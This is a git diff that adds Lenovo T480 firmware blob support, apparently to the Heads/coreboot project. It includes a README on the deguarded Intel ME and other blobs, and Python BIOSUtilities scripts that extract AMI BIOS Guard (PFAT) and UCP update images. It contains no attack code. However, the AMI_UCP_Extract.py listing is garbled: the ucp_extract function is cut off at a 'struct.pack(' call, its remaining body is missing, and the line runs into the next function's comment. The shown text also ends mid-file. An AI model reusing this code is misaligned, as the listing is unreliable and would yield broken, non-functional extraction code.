diff --git a/blobs/t480/.gitignore b/blobs/t480/.gitignore new file mode 100644 index 00000000..a9b63f4a --- /dev/null +++ b/blobs/t480/.gitignore @@ -0,0 +1,2 @@ +me.bin +tb.bin \ No newline at end of file diff --git a/blobs/t480/README.md b/blobs/t480/README.md new file mode 100644 index 00000000..2f7d1620 --- /dev/null +++ b/blobs/t480/README.md @@ -0,0 +1,13 @@ +# T480 Blobs + +Coreboot on the T480 requires the following binary blobs: + +- `me.bin` - Consists of Intel’s Management Engine (ME), which was modified and deguarded using [me_cleaner](https://github.com/corna/me_cleaner) and [deguard](https://codeberg.org/libreboot/deguard) (written by Mate Kukri) to remove all but the modules which are necessary for the CPU to function. +- `tb.bin` - Consists of Thunderbolt firmware. +- `gbe.bin` - Consists of hardware/software configuration data for the Gigabit Ethernet (GbE) controller. +- `ifd_16.bin` - Consists of the Intel Flash Descriptor (IFD). + +Heads supplies an IFD and GbE blob, which were copied from libreboot. We changed the MAC address of the GbE blob to `00:de:ad:c0:ff:ee` using [nvmutil](https://libreboot.org/docs/install/nvmutil.html), to support anonymity and build reproducibility. + +When building any T480 board variant with `make`, the build system will download a copy the Intel ME. `me.bin` was extracted from a Dell-Inspiron Windows installer firmware update. + diff --git a/blobs/t480/biosutilities/.gitignore b/blobs/t480/biosutilities/.gitignore new file mode 100644 index 00000000..238b83e2 --- /dev/null +++ b/blobs/t480/biosutilities/.gitignore @@ -0,0 +1,5 @@ +# Skip all external files +external/* + +# Keep external > requirements file +!external/requirements.txt diff --git a/blobs/t480/biosutilities/AMI_PFAT_Extract.py b/blobs/t480/biosutilities/AMI_PFAT_Extract.py new file mode 100644 index 00000000..026b74ae --- /dev/null +++ b/blobs/t480/biosutilities/AMI_PFAT_Extract.py @@ -0,0 +1,319 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +AMI PFAT Extract +AMI BIOS Guard Extractor +Copyright (C) 2018-2022 Plato Mavropoulos +""" + +TITLE = 'AMI BIOS Guard Extractor v4.0_a12' + +import os +import re +import sys +import ctypes + +# Stop __pycache__ generation +sys.dont_write_bytecode = True + +from common.externals import get_bgs_tool +from common.num_ops import get_ordinal +from common.path_ops import make_dirs, safe_name, get_extract_path, extract_suffix +from common.patterns import PAT_AMI_PFAT +from common.struct_ops import char, get_struct, uint8_t, uint16_t, uint32_t +from common.system import printer +from common.templates import BIOSUtility +from common.text_ops import file_to_bytes + +class AmiBiosGuardHeader(ctypes.LittleEndianStructure): + _pack_ = 1 + _fields_ = [ + ('Size', uint32_t), # 0x00 Header + Entries + ('Checksum', uint32_t), # 0x04 ? + ('Tag', char*8), # 0x04 _AMIPFAT + ('Flags', uint8_t), # 0x10 ? + # 0x11 + ] + + def struct_print(self, p): + printer(['Size :', f'0x{self.Size:X}'], p, False) + printer(['Checksum:', f'0x{self.Checksum:04X}'], p, False) + printer(['Tag :', self.Tag.decode('utf-8')], p, False) + printer(['Flags :', f'0x{self.Flags:02X}'], p, False) + +class IntelBiosGuardHeader(ctypes.LittleEndianStructure): + _pack_ = 1 + _fields_ = [ + ('BGVerMajor', uint16_t), # 0x00 + ('BGVerMinor', uint16_t), # 0x02 + ('PlatformID', uint8_t*16), # 0x04 + ('Attributes', uint32_t), # 0x14 + ('ScriptVerMajor', uint16_t), # 0x16 + ('ScriptVerMinor', uint16_t), # 0x18 + ('ScriptSize', uint32_t), # 0x1C + ('DataSize', uint32_t), # 0x20 + ('BIOSSVN', uint32_t), # 0x24 + ('ECSVN', uint32_t), # 0x28 + ('VendorInfo', uint32_t), # 0x2C + # 0x30 + ] + + def get_platform_id(self): + id_byte = bytes(self.PlatformID) + + id_text = re.sub(r'[\n\t\r\x00 ]', '', id_byte.decode('utf-8','ignore')) + + id_hexs = f'{int.from_bytes(id_byte, "big"):0{0x10 * 2}X}' + id_guid = f'{{{id_hexs[:8]}-{id_hexs[8:12]}-{id_hexs[12:16]}-{id_hexs[16:20]}-{id_hexs[20:]}}}' + + return f'{id_text} {id_guid}' + + def get_flags(self): + attr = IntelBiosGuardHeaderGetAttributes() + attr.asbytes = self.Attributes + + return attr.b.SFAM, attr.b.ProtectEC, attr.b.GFXMitDis, attr.b.FTU, attr.b.Reserved + + def struct_print(self, p): + no_yes = ['No','Yes'] + f1,f2,f3,f4,f5 = self.get_flags() + + printer(['BIOS Guard Version :', f'{self.BGVerMajor}.{self.BGVerMinor}'], p, False) + printer(['Platform Identity :', self.get_platform_id()], p, False) + printer(['Signed Flash Address Map :', no_yes[f1]], p, False) + printer(['Protected EC OpCodes :', no_yes[f2]], p, False) + printer(['Graphics Security Disable :', no_yes[f3]], p, False) + printer(['Fault Tolerant Update :', no_yes[f4]], p, False) + printer(['Attributes Reserved :', f'0x{f5:X}'], p, False) + printer(['Script Version :', f'{self.ScriptVerMajor}.{self.ScriptVerMinor}'], p, False) + printer(['Script Size :', f'0x{self.ScriptSize:X}'], p, False) + printer(['Data Size :', f'0x{self.DataSize:X}'], p, False) + printer(['BIOS Security Version Number:', f'0x{self.BIOSSVN:X}'], p, False) + printer(['EC Security Version Number :', f'0x{self.ECSVN:X}'], p, False) + printer(['Vendor Information :', f'0x{self.VendorInfo:X}'], p, False) + +class IntelBiosGuardHeaderAttributes(ctypes.LittleEndianStructure): + _fields_ = [ + ('SFAM', uint32_t, 1), # Signed Flash Address Map + ('ProtectEC', uint32_t, 1), # Protected EC OpCodes + ('GFXMitDis', uint32_t, 1), # GFX Security Disable + ('FTU', uint32_t, 1), # Fault Tolerant Update + ('Reserved', uint32_t, 28) # Reserved/Unknown + ] + +class IntelBiosGuardHeaderGetAttributes(ctypes.Union): + _fields_ = [ + ('b', IntelBiosGuardHeaderAttributes), + ('asbytes', uint32_t) + ] + +class IntelBiosGuardSignature2k(ctypes.LittleEndianStructure): + _pack_ = 1 + _fields_ = [ + ('Unknown0', uint32_t), # 0x000 + ('Unknown1', uint32_t), # 0x004 + ('Modulus', uint32_t*64), # 0x008 + ('Exponent', uint32_t), # 0x108 + ('Signature', uint32_t*64), # 0x10C + # 0x20C + ] + + def struct_print(self, p): + Modulus = f'{int.from_bytes(self.Modulus, "little"):0{0x100 * 2}X}' + Signature = f'{int.from_bytes(self.Signature, "little"):0{0x100 * 2}X}' + + printer(['Unknown 0:', f'0x{self.Unknown0:X}'], p, False) + printer(['Unknown 1:', f'0x{self.Unknown1:X}'], p, False) + printer(['Modulus :', f'{Modulus[:32]} [...]'], p, False) + printer(['Exponent :', f'0x{self.Exponent:X}'], p, False) + printer(['Signature:', f'{Signature[:32]} [...]'], p, False) + +def is_ami_pfat(input_file): + input_buffer = file_to_bytes(input_file) + + return bool(get_ami_pfat(input_buffer)) + +def get_ami_pfat(input_file): + input_buffer = file_to_bytes(input_file) + + match = PAT_AMI_PFAT.search(input_buffer) + + return input_buffer[match.start() - 0x8:] if match else b'' + +def get_file_name(index, name): + return safe_name(f'{index:02d} -- {name}') + +def parse_bg_script(script_data, padding=0): + is_opcode_div = len(script_data) % 8 == 0 + + if not is_opcode_div: + printer('Error: Script is not divisible by OpCode length!', padding, False) + + return 1 + + is_begin_end = script_data[:8] + script_data[-8:] == b'\x01' + b'\x00' * 7 + b'\xFF' + b'\x00' * 7 + + if not is_begin_end: + printer('Error: Script lacks Begin and/or End OpCodes!', padding, False) + + return 2 + + BigScript = get_bgs_tool() + + if not BigScript: + printer('Note: BIOS Guard Script Tool optional dependency is missing!', padding, False) + + return 3 + + script = BigScript(code_bytes=script_data).to_string().replace('\t',' ').split('\n') + + for opcode in script: + if opcode.endswith(('begin','end')): spacing = padding + elif opcode.endswith(':'): spacing = padding + 4 + else: spacing = padding + 12 + + operands = [operand for operand in opcode.split(' ') if operand] + printer(('{:<12s}' + '{:<11s}' * (len(operands) - 1)).format(*operands), spacing, False) + + return 0 + +def parse_pfat_hdr(buffer, padding=0): + block_all = [] + + pfat_hdr = get_struct(buffer, 0x0, AmiBiosGuardHeader) + + hdr_size = pfat_hdr.Size + hdr_data = buffer[PFAT_AMI_HDR_LEN:hdr_size] + hdr_text = hdr_data.decode('utf-8').splitlines() + + printer('AMI BIOS Guard Header:\n', padding) + + pfat_hdr.struct_print(padding + 4) + + hdr_title,*hdr_files = hdr_text + + files_count = len(hdr_files) + + hdr_tag,*hdr_indexes = hdr_title.split('II') + + printer(hdr_tag + '\n', padding + 4) + + bgt_indexes = [int(h, 16) for h in re.findall(r'.{1,4}', hdr_indexes[0])] if hdr_indexes else [] + + for index,entry in enumerate(hdr_files): + entry_parts = entry.split(';') + + info = entry_parts[0].split() + name = entry_parts[1] + + flags = int(info[0]) + param = info[1] + count = int(info[2]) + + order = get_ordinal((bgt_indexes[index] if bgt_indexes else index) + 1) + + desc = f'{name} (Index: {index + 1:02d}, Flash: {order}, Parameter: {param}, Flags: 0x{flags:X}, Blocks: {count})' + + block_all += [(desc, name, order, param, flags, index, i, count) for i in range(count)] + + _ = [printer(block[0], padding + 8, False) for block in block_all if block[6] == 0] + + return block_all, hdr_size, files_count + +def parse_pfat_file(input_file, extract_path, padding=0): + input_buffer = file_to_bytes(input_file) + + pfat_buffer = get_ami_pfat(input_buffer) + + file_path = '' + all_blocks_dict = {} + + extract_name = os.path.basename(extract_path).rstrip(extract_suffix()) + + make_dirs(extract_path, delete=True) + + block_all,block_off,file_count = parse_pfat_hdr(pfat_buffer, padding) + + for block in block_all: + file_desc,file_name,_,_,_,file_index,block_index,block_count = block + + if block_index == 0: + printer(file_desc, padding + 4) + + file_path = os.path.join(extract_path, get_file_name(file_index + 1, file_name)) + + all_blocks_dict[file_index] = b'' + + block_status = f'{block_index + 1}/{block_count}' + + bg_hdr = get_struct(pfat_buffer, block_off, IntelBiosGuardHeader) + + printer(f'Intel BIOS Guard {block_status} Header:\n', padding + 8) + + bg_hdr.struct_print(padding + 12) + + bg_script_bgn = block_off + PFAT_BLK_HDR_LEN + bg_script_end = bg_script_bgn + bg_hdr.ScriptSize + bg_script_bin = pfat_buffer[bg_script_bgn:bg_script_end] + + bg_data_bgn = bg_script_end + bg_data_end = bg_data_bgn + bg_hdr.DataSize + bg_data_bin = pfat_buffer[bg_data_bgn:bg_data_end] + + block_off = bg_data_end # Assume next block starts at data end + + is_sfam,_,_,_,_ = bg_hdr.get_flags() # SFAM, ProtectEC, GFXMitDis, FTU, Reserved + + if is_sfam: + bg_sig_bgn = bg_data_end + bg_sig_end = bg_sig_bgn + PFAT_BLK_S2K_LEN + bg_sig_bin = pfat_buffer[bg_sig_bgn:bg_sig_end] + + if len(bg_sig_bin) == PFAT_BLK_S2K_LEN: + bg_sig = get_struct(bg_sig_bin, 0x0, IntelBiosGuardSignature2k) + + printer(f'Intel BIOS Guard {block_status} Signature:\n', padding + 8) + + bg_sig.struct_print(padding + 12) + + block_off = bg_sig_end # Adjust next block to start at data + signature end + + printer(f'Intel BIOS Guard {block_status} Script:\n', padding + 8) + + _ = parse_bg_script(bg_script_bin, padding + 12) + + with open(file_path, 'ab') as out_dat: + out_dat.write(bg_data_bin) + + all_blocks_dict[file_index] += bg_data_bin + + pfat_oob_data = pfat_buffer[block_off:] # Store out-of-bounds data after the end of PFAT files + + pfat_oob_name = get_file_name(file_count + 1, f'{extract_name}_OOB.bin') + + pfat_oob_path = os.path.join(extract_path, pfat_oob_name) + + with open(pfat_oob_path, 'wb') as out_oob: + out_oob.write(pfat_oob_data) + + if is_ami_pfat(pfat_oob_data): + parse_pfat_file(pfat_oob_data, get_extract_path(pfat_oob_path), padding) + + in_all_data = b''.join([block[1] for block in sorted(all_blocks_dict.items())]) + + in_all_name = get_file_name(0, f'{extract_name}_ALL.bin') + + in_all_path = os.path.join(extract_path, in_all_name) + + with open(in_all_path, 'wb') as out_all: + out_all.write(in_all_data + pfat_oob_data) + + return 0 + +PFAT_AMI_HDR_LEN = ctypes.sizeof(AmiBiosGuardHeader) +PFAT_BLK_HDR_LEN = ctypes.sizeof(IntelBiosGuardHeader) +PFAT_BLK_S2K_LEN = ctypes.sizeof(IntelBiosGuardSignature2k) + +if __name__ == '__main__': + BIOSUtility(TITLE, is_ami_pfat, parse_pfat_file).run_utility() diff --git a/blobs/t480/biosutilities/AMI_UCP_Extract.py b/blobs/t480/biosutilities/AMI_UCP_Extract.py new file mode 100644 index 00000000..2f59e6fe --- /dev/null +++ b/blobs/t480/biosutilities/AMI_UCP_Extract.py @@ -0,0 +1,515 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +AMI UCP Extract +AMI UCP Update Extractor +Copyright (C) 2021-2022 Plato Mavropoulos +""" + +TITLE = 'AMI UCP Update Extractor v2.0_a20' + +import os +import re +import sys +import struct +import ctypes +import contextlib + +# Stop __pycache__ generation +sys.dont_write_bytecode = True + +from common.checksums import get_chk_16 +from common.comp_efi import efi_decompress, is_efi_compressed +from common.path_ops import agnostic_path, make_dirs, safe_name, safe_path, get_extract_path +from common.patterns import PAT_AMI_UCP, PAT_INTEL_ENG +from common.struct_ops import char, get_struct, uint8_t, uint16_t, uint32_t +from common.system import printer +from common.templates import BIOSUtility +from common.text_ops import file_to_bytes, to_string + +from AMI_PFAT_Extract import is_ami_pfat, parse_pfat_file +from Insyde_IFD_Extract import insyde_ifd_extract, is_insyde_ifd + +class UafHeader(ctypes.LittleEndianStructure): + _pack_ = 1 + _fields_ = [ + ('ModuleTag', char*4), # 0x00 + ('ModuleSize', uint32_t), # 0x04 + ('Checksum', uint16_t), # 0x08 + ('Unknown0', uint8_t), # 0x0A + ('Unknown1', uint8_t), # 0x0A + ('Reserved', uint8_t*4), # 0x0C + # 0x10 + ] + + def _get_reserved(self): + res_bytes = bytes(self.Reserved) + + res_hex = f'0x{int.from_bytes(res_bytes, "big"):0{0x4 * 2}X}' + + res_str = re.sub(r'[\n\t\r\x00 ]', '', res_bytes.decode('utf-8','ignore')) + + res_txt = f' ({res_str})' if len(res_str) else '' + + return f'{res_hex}{res_txt}' + + def struct_print(self, p): + printer(['Tag :', self.ModuleTag.decode('utf-8')], p, False) + printer(['Size :', f'0x{self.ModuleSize:X}'], p, False) + printer(['Checksum :', f'0x{self.Checksum:04X}'], p, False) + printer(['Unknown 0 :', f'0x{self.Unknown0:02X}'], p, False) + printer(['Unknown 1 :', f'0x{self.Unknown1:02X}'], p, False) + printer(['Reserved :', self._get_reserved()], p, False) + +class UafModule(ctypes.LittleEndianStructure): + _pack_ = 1 + _fields_ = [ + ('CompressSize', uint32_t), # 0x00 + ('OriginalSize', uint32_t), # 0x04 + # 0x08 + ] + + def struct_print(self, p, filename, description): + printer(['Compress Size:', f'0x{self.CompressSize:X}'], p, False) + printer(['Original Size:', f'0x{self.OriginalSize:X}'], p, False) + printer(['Filename :', filename], p, False) + printer(['Description :', description], p, False) + +class UiiHeader(ctypes.LittleEndianStructure): + _pack_ = 1 + _fields_ = [ + ('UIISize', uint16_t), # 0x00 + ('Checksum', uint16_t), # 0x02 + ('UtilityVersion', uint32_t), # 0x04 AFU|BGT (Unknown, Signed) + ('InfoSize', uint16_t), # 0x08 + ('SupportBIOS', uint8_t), # 0x0A + ('SupportOS', uint8_t), # 0x0B + ('DataBusWidth', uint8_t), # 0x0C + ('ProgramType', uint8_t), # 0x0D + ('ProgramMode', uint8_t), # 0x0E + ('SourceSafeRel', uint8_t), # 0x0F + # 0x10 + ] + + SBI = {1: 'ALL', 2: 'AMIBIOS8', 3: 'UEFI', 4: 'AMIBIOS8/UEFI'} + SOS = {1: 'DOS', 2: 'EFI', 3: 'Windows', 4: 'Linux', 5: 'FreeBSD', 6: 'MacOS', 128: 'Multi-Platform'} + DBW = {1: '16b', 2: '16/32b', 3: '32b', 4: '64b'} + PTP = {1: 'Executable', 2: 'Library', 3: 'Driver'} + PMD = {1: 'API', 2: 'Console', 3: 'GUI', 4: 'Console/GUI'} + + def struct_print(self, p, description): + SupportBIOS = self.SBI.get(self.SupportBIOS, f'Unknown ({self.SupportBIOS})') + SupportOS = self.SOS.get(self.SupportOS, f'Unknown ({self.SupportOS})') + DataBusWidth = self.DBW.get(self.DataBusWidth, f'Unknown ({self.DataBusWidth})') + ProgramType = self.PTP.get(self.ProgramType, f'Unknown ({self.ProgramType})') + ProgramMode = self.PMD.get(self.ProgramMode, f'Unknown ({self.ProgramMode})') + + printer(['UII Size :', f'0x{self.UIISize:X}'], p, False) + printer(['Checksum :', f'0x{self.Checksum:04X}'], p, False) + printer(['Tool Version :', f'0x{self.UtilityVersion:08X}'], p, False) + printer(['Info Size :', f'0x{self.InfoSize:X}'], p, False) + printer(['Supported BIOS:', SupportBIOS], p, False) + printer(['Supported OS :', SupportOS], p, False) + printer(['Data Bus Width:', DataBusWidth], p, False) + printer(['Program Type :', ProgramType], p, False) + printer(['Program Mode :', ProgramMode], p, False) + printer(['SourceSafe Tag:', f'{self.SourceSafeRel:02d}'], p, False) + printer(['Description :', description], p, False) + +class DisHeader(ctypes.LittleEndianStructure): + _pack_ = 1 + _fields_ = [ + ('PasswordSize', uint16_t), # 0x00 + ('EntryCount', uint16_t), # 0x02 + ('Password', char*12), # 0x04 + # 0x10 + ] + + def struct_print(self, p): + printer(['Password Size:', f'0x{self.PasswordSize:X}'], p, False) + printer(['Entry Count :', self.EntryCount], p, False) + printer(['Password :', self.Password.decode('utf-8')], p, False) + +class DisModule(ctypes.LittleEndianStructure): + _pack_ = 1 + _fields_ = [ + ('EnabledDisabled', uint8_t), # 0x00 + ('ShownHidden', uint8_t), # 0x01 + ('Command', char*32), # 0x02 + ('Description', char*256), # 0x22 + # 0x122 + ] + + ENDIS = {0: 'Disabled', 1: 'Enabled'} + SHOWN = {0: 'Hidden', 1: 'Shown', 2: 'Shown Only'} + + def struct_print(self, p): + EnabledDisabled = self.ENDIS.get(self.EnabledDisabled, f'Unknown ({self.EnabledDisabled})') + ShownHidden = self.SHOWN.get(self.ShownHidden, f'Unknown ({self.ShownHidden})') + + printer(['State :', EnabledDisabled], p, False) + printer(['Display :', ShownHidden], p, False) + printer(['Command :', self.Command.decode('utf-8').strip()], p, False) + printer(['Description:', self.Description.decode('utf-8').strip()], p, False) + +# Validate UCP Module Checksum-16 +def chk16_validate(data, tag, padd=0): + if get_chk_16(data) != 0: + printer(f'Error: Invalid UCP Module {tag} Checksum!', padd, pause=True) + else: + printer(f'Checksum of UCP Module {tag} is valid!', padd) + +# Check if input is AMI UCP image +def is_ami_ucp(in_file): + buffer = file_to_bytes(in_file) + + return bool(get_ami_ucp(buffer)[0] is not None) + +# Get all input file AMI UCP patterns +def get_ami_ucp(in_file): + buffer = file_to_bytes(in_file) + + uaf_len_max = 0x0 # Length of largest detected @UAF|@HPU + uaf_buf_bin = None # Buffer of largest detected @UAF|@HPU + uaf_buf_tag = '@UAF' # Tag of largest detected @UAF|@HPU + + for uaf in PAT_AMI_UCP.finditer(buffer): + uaf_len_cur = int.from_bytes(buffer[uaf.start() + 0x4:uaf.start() + 0x8], 'little') + + if uaf_len_cur > uaf_len_max: + uaf_len_max = uaf_len_cur + uaf_hdr_off = uaf.start() + uaf_buf_bin = buffer[uaf_hdr_off:uaf_hdr_off + uaf_len_max] + uaf_buf_tag = uaf.group(0)[:4].decode('utf-8','ignore') + + return uaf_buf_bin, uaf_buf_tag + +# Get list of @UAF|@HPU Modules +def get_uaf_mod(buffer, uaf_off=0x0): + uaf_all = [] # Initialize list of all @UAF|@HPU Modules + + while buffer[uaf_off] == 0x40: # ASCII of @ is 0x40 + uaf_hdr = get_struct(buffer, uaf_off, UafHeader) # Parse @UAF|@HPU Module Structure + + uaf_tag = uaf_hdr.ModuleTag.decode('utf-8') # Get unique @UAF|@HPU Module Tag + + uaf_all.append([uaf_tag, uaf_off, uaf_hdr]) # Store @UAF|@HPU Module Info + + uaf_off += uaf_hdr.ModuleSize # Adjust to next @UAF|@HPU Module offset + + if uaf_off >= len(buffer): + break # Stop parsing at EOF + + # Check if @UAF|@HPU Module @NAL exists and place it first + # Parsing @NAL first allows naming all @UAF|@HPU Modules + for mod_idx,mod_val in enumerate(uaf_all): + if mod_val[0] == '@NAL': + uaf_all.insert(1, uaf_all.pop(mod_idx)) # After UII for visual purposes + + break # @NAL found, skip the rest + + return uaf_all + +# Parse & Extract AMI UCP structures +def ucp_extract(in_file, extract_path, padding=0, checksum=False): + input_buffer = file_to_bytes(in_file) + + nal_dict = {} # Initialize @NAL Dictionary per UCP + + printer('Utility Configuration Program', padding) + + make_dirs(extract_path, delete=True) + + # Get best AMI UCP Pattern match based on @UAF|@HPU Size + ucp_buffer,ucp_tag = get_ami_ucp(input_buffer) + + uaf_hdr = get_struct(ucp_buffer, 0, UafHeader) # Parse @UAF|@HPU Header Structure + + printer(f'Utility Auxiliary File > {ucp_tag}:\n', padding + 4) + + uaf_hdr.struct_print(padding + 8) + + fake = struct.pack(' @UAF|@HPU Module/Section +def uaf_extract(buffer, extract_path, mod_info, padding=0, checksum=False, nal_dict=None): + if nal_dict is None: + nal_dict = {} + + uaf_tag,uaf_off,uaf_hdr = mod_info + + uaf_data_all = buffer[uaf_off:uaf_off + uaf_hdr.ModuleSize] # @UAF|@HPU Module Entire Data + + uaf_data_mod = uaf_data_all[UAF_HDR_LEN:] # @UAF|@HPU Module EFI Data + + uaf_data_raw = uaf_data_mod[UAF_MOD_LEN:] # @UAF|@HPU Module Raw Data + + printer(f'Utility Auxiliary File > {uaf_tag}:\n', padding) + + uaf_hdr.struct_print(padding + 4) # Print @UAF|@HPU Module Info + + uaf_mod = get_struct(buffer, uaf_off + UAF_HDR_LEN, UafModule) # Parse UAF Module EFI Structure + + is_comp = uaf_mod.CompressSize != uaf_mod.OriginalSize # Detect @UAF|@HPU Module EFI Compression + + if uaf_tag in nal_dict: + uaf_name = nal_dict[uaf_tag][1] # Always prefer @NAL naming first + elif uaf_tag in UAF_TAG_DICT: + uaf_name = UAF_TAG_DICT[uaf_tag][0] # Otherwise use built-in naming + elif uaf_tag == '@ROM': + uaf_name = 'BIOS.bin' # BIOS/PFAT Firmware (w/o Signature) + elif uaf_tag.startswith('@R0'): + uaf_name = f'BIOS_0{uaf_tag[3:]}.bin' # BIOS/PFAT Firmware + elif uaf_tag.startswith('@S0'): + uaf_name = f'BIOS_0{uaf_tag[3:]}.sig' # BIOS/PFAT Signature + elif uaf_tag.startswith('@DR'): + uaf_name = f'DROM_0{uaf_tag[3:]}.bin' # Thunderbolt Retimer Firmware + elif uaf_tag.startswith('@DS'): + uaf_name = f'DROM_0{uaf_tag[3:]}.sig' # Thunderbolt Retimer Signature + elif uaf_tag.startswith('@EC'): + uaf_name = f'EC_0{uaf_tag[3:]}.bin' # Embedded Controller Firmware + elif uaf_tag.startswith('@ME'): + uaf_name = f'ME_0{uaf_tag[3:]}.bin' # Management Engine Firmware + else: + uaf_name = uaf_tag # Could not name the @UAF|@HPU Module, use Tag instead + + uaf_fext = '' if uaf_name != uaf_tag else '.bin' + + uaf_fdesc = UAF_TAG_DICT[uaf_tag][1] if uaf_tag in UAF_TAG_DICT else uaf_name + + uaf_mod.struct_print(padding + 4, uaf_name + uaf_fext, uaf_fdesc) # Print @UAF|@HPU Module EFI Info + + # Check if unknown @UAF|@HPU Module Tag is present in @NAL but not in built-in dictionary + if uaf_tag in nal_dict and uaf_tag not in UAF_TAG_DICT and not uaf_tag.startswith(('@ROM','@R0','@S0','@DR','@DS')): + printer(f'Note: Detected new AMI UCP Module {uaf_tag} ({nal_dict[uaf_tag][1]}) in @NAL!', padding + 4, pause=True) + + # Generate @UAF|@HPU Module File name, depending on whether decompression will be required + uaf_sname = safe_name(uaf_name + ('.temp' if is_comp else uaf_fext)) + if uaf_tag in nal_dict: + uaf_npath = safe_path(extract_path, nal_dict[uaf_tag][0]) + make_dirs(uaf_npath, exist_ok=True) + uaf_fname = safe_path(uaf_npath, uaf_sname) + else: + uaf_fname = safe_path(extract_path, uaf_sname) + + if checksum: + chk16_validate(uaf_data_all, uaf_tag, padding + 4) + + # Parse Utility Identification Information @UAF|@HPU Module (@UII) + if uaf_tag == '@UII': + info_hdr = get_struct(uaf_data_raw, 0, UiiHeader) # Parse @UII Module Raw Structure + + info_data = uaf_data_raw[max(UII_HDR_LEN,info_hdr.InfoSize):info_hdr.UIISize] # @UII Module Info Data + + # Get @UII Module Info/Description text field + info_desc = info_data.decode('utf-8','ignore').strip('\x00 ') + + printer('Utility Identification Information:\n', padding + 4) + + info_hdr.struct_print(padding + 8, info_desc) # Print @UII Module Info + + if checksum: + chk16_validate(uaf_data_raw, '@UII > Info', padding + 8) + + # Store/Save @UII Module Info in file + with open(uaf_fname[:-4] + '.txt', 'a', encoding='utf-8') as uii_out: + with contextlib.redirect_stdout(uii_out): + info_hdr.struct_print(0, info_desc) # Store @UII Module Info + + # Adjust @UAF|@HPU Module Raw Data for extraction + if is_comp: + # Some Compressed @UAF|@HPU Module EFI data lack necessary EOF padding + if uaf_mod.CompressSize > len(uaf_data_raw): + comp_padd = b'\x00' * (uaf_mod.CompressSize - len(uaf_data_raw)) + uaf_data_raw = uaf_data_mod[:UAF_MOD_LEN] + uaf_data_raw + comp_padd # Add missing padding for decompression + else: + uaf_data_raw = uaf_data_mod[:UAF_MOD_LEN] + uaf_data_raw # Add the EFI/Tiano Compression info before Raw Data + else: + uaf_data_raw = uaf_data_raw[:uaf_mod.OriginalSize] # No compression, extend to end of Original @UAF|@HPU Module size + + # Store/Save @UAF|@HPU Module file + if uaf_tag != '@UII': # Skip @UII binary, already parsed + with open(uaf_fname, 'wb') as uaf_out: + uaf_out.write(uaf_data_raw) + + # @UAF|@HPU Module EFI/Tiano Decompression + if is_comp and is_efi_compressed(uaf_data_raw, False): + dec_fname = uaf_fname.replace('.temp', uaf_fext) # Decompressed @UAF|@HPU Module file path + + if efi_decompress(uaf_fname, dec_fname, padding + 4) == 0: + with open(dec_fname, 'rb') as dec: + uaf_data_raw = dec.read() # Read back the @UAF|@HPU Module decompressed Raw data + + os.remove(uaf_fname) # Successful decompression, delete compressed @UAF|@HPU Module file + + uaf_fname = dec_fname # Adjust @UAF|@HPU Module file path to the decompressed one + + # Process and Print known text only @UAF|@HPU Modules (after EFI/Tiano Decompression) + if uaf_tag in UAF_TAG_DICT and UAF_TAG_DICT[uaf_tag][2] == 'Text': + printer(f'{UAF_TAG_DICT[uaf_tag][1]}:', padding + 4) + printer(uaf_data_raw.decode('utf-8','ignore'), padding + 8) + + # Parse Default Command Status @UAF|@HPU Module (@DIS) + if len(uaf_data_raw) and uaf_tag == '@DIS': + dis_hdr = get_struct(uaf_data_raw, 0x0, DisHeader) # Parse @DIS Module Raw Header Structure + + printer('Default Command Status Header:\n', padding + 4) + + dis_hdr.struct_print(padding + 8) # Print @DIS Module Raw Header Info + + # Store/Save @DIS Module Header Info in file + with open(uaf_fname[:-3] + 'txt', 'a', encoding='utf-8') as dis: + with contextlib.redirect_stdout(dis): + dis_hdr.struct_print(0) # Store @DIS Module Header Info + + dis_data = uaf_data_raw[DIS_HDR_LEN:] # @DIS Module Entries Data + + # Parse all @DIS Module Entries + for mod_idx in range(dis_hdr.EntryCount): + dis_mod = get_struct(dis_data, mod_idx * DIS_MOD_LEN, DisModule) # Parse @DIS Module Raw Entry Structure + + printer(f'Default Command Status Entry {mod_idx + 1:02d}/{dis_hdr.EntryCount:02d}:\n', padding + 8) + + dis_mod.struct_print(padding + 12) # Print @DIS Module Raw Entry Info + + # Store/Save @DIS Module Entry Info in file + with open(uaf_fname[:-3] + 'txt', 'a', encoding='utf-8') as dis: + with contextlib.redirect_stdout(dis): + printer() + dis_mod.struct_print(4) # Store @DIS Module Entry Info + + os.remove(uaf_fname) # Delete @DIS Module binary, info exported as text + + # Parse Name List @UAF|@HPU Module (@NAL) + if len(uaf_data_raw) >= 5 and (uaf_tag,uaf_data_raw[0],uaf_data_raw[4]) == ('@NAL',0x40,0x3A): + nal_info = uaf_data_raw.decode('utf-8','ignore').replace('\r','').strip().split('\n') + + printer('AMI UCP Module Name List:\n', padding + 4) + + # Parse all @NAL Module Entries + for info in nal_info: + info_tag,info_value = info.split(':',1) + + printer(f'{info_tag} : {info_value}', padding + 8, False) # Print @NAL Module Tag-Path Info + + info_part = agnostic_path(info_value).parts # Split OS agnostic path in parts + info_path = to_string(info_part[1:-1], os.sep) # Get path without drive/root or file + info_name = info_part[-1] # Get file from last path part + + nal_dict[info_tag] = (info_path,info_name) # Assign a file path & name to each Tag + + # Parse Insyde BIOS @UAF|@HPU Module (@INS) + if uaf_tag == '@INS' and is_insyde_ifd(uaf_fname): + ins_dir = os.path.join(extract_path, safe_name(f'{uaf_tag}_nested-IFD')) # Generate extraction directory + + if insyde_ifd_extract(uaf_fname, get_extract_path(ins_dir), padding + 4) == 0: + os.remove(uaf_fname) # Delete raw nested Insyde IFD image after successful extraction + + # Detect & Unpack AMI BIOS Guard (PFAT) BIOS image + if is_ami_pfat(uaf_data_raw): + pfat_dir = os.path.join(extract_path, safe_name(uaf_name)) + + parse_pfat_file(uaf_data_raw, get_extract_path(pfat_dir), padding + 4) + + os.remove(uaf_fname) # Delete raw PFAT BIOS image after successful extraction + + # Detect Intel Engine firmware image and show ME Analyzer advice + if uaf_tag.startswith('@ME') and PAT_INTEL_ENG.search(uaf_data_raw): + printer('Intel Management Engine (ME) Firmware:\n', padding + 4) + printer('Use "ME Analyzer" from https://github.com/platomav/MEAnalyzer', padding + 8, False) + + # Parse Nested AMI UCP image + if is_ami_ucp(uaf_data_raw): + uaf_dir = os.path.join(extract_path, safe_name(f'{uaf_tag}_nested-UCP')) # Generate extraction directory + + ucp_extract(uaf_data_raw, get_extract_path(uaf_dir), padding + 4, checksum) # Call recursively + + os.remove(uaf_fname) # Delete raw nested AMI UCP image after successful extraction + + return nal_dict + +# Get common ctypes Structure Sizes +UAF_HDR_LEN = ctypes.sizeof(UafHeader) 